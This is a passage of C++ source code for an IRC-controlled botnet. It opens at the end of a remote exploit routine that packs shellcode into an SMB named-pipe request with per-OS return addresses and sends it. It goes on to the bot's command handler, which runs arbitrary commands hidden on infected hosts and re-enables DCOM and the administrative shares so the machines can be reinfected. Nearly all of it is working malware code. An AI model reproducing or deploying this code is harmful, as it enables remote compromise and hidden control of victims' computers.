szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000); // Send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } // Send the evil request if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false; free(szInBuf); } CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); } return bRetVal; #endif // _WIN32 } break; default: return false; break; } return false; }
bool CBot::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) { CString sId(pMsg->sChatString.Token(1, " ", true)); if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo); #ifdef WIN32 /// should unsecure system as remove bot to allow recycling // // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares Execute("net.exe", "net share c$=c:\\"); Execute("net.exe", "net share d$=d:\\"); Execute("net.exe", "net share e$=e:\\"); Execute("net.exe", "net share ipc$"); Execute("net.exe", "net share admin$"); // Delete Autostart if(g_pMainCtrl->m_cBot.as_enabled.bValue) g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue); if(g_pMainCtrl->m_cBot.as_service.bValue) g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue); #endif g_pMainCtrl->m_cInstaller.Uninstall(); g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; } else if(!pMsg->sCmd.Compare("bot.execute")) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #else CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr()); if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #endif return true; } else if(!pMsg->sCmd.Compare("bot.open")) { if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; #ifdef WIN32 bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32; #else bRet=system(sText.CStr())>0; #endif if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.dns")) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr()); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else if(!pMsg->sCmd.Compare("bot.about")) { CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr()); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.id")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.nick")) { g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) { g_pMainCtrl->m_cIRC.m_bRunning=false; return true; } else if(!pMsg->sCmd.Compare("bot.sysinfo")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.longuptime")) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } else if(!pMsg->sCmd.Compare("bot.status")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.rndnick")) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr()); g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.flushdns")) { #ifdef WIN32 Execute("ipconfig.exe", "/flushdns"); #else Execute("nscd", "-i hosts"); #endif // WIN32 return true; } else if(!pMsg->sCmd.Compare("bot.secure")) { #ifdef WIN32 // Set EnableDCOM to "N" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // Secure Shares system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot Secured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.unsecure")) { #ifdef WIN32 // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares system("net share c$=c:\\"); system("net share d$=d:\\"); system("net share e$=e:\\"); system("net share ipc$"); system("net share admin$"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot UnSecured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.command")) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr()); if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; } else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } return false; }
int CString::Compare(const CString& str, const size_t pos, const size_t len) const { return Compare(str.Str(), pos, len); }
int CString::Compare(const CString& str) const { return Compare(str.Str(), str.Length()); }
size_t CString::Pos(const CString& str, const size_t pos) const { return Pos(str.Str(), pos); }
size_t CString::Pos(const CString& str) const{ return Pos(str.Str()); }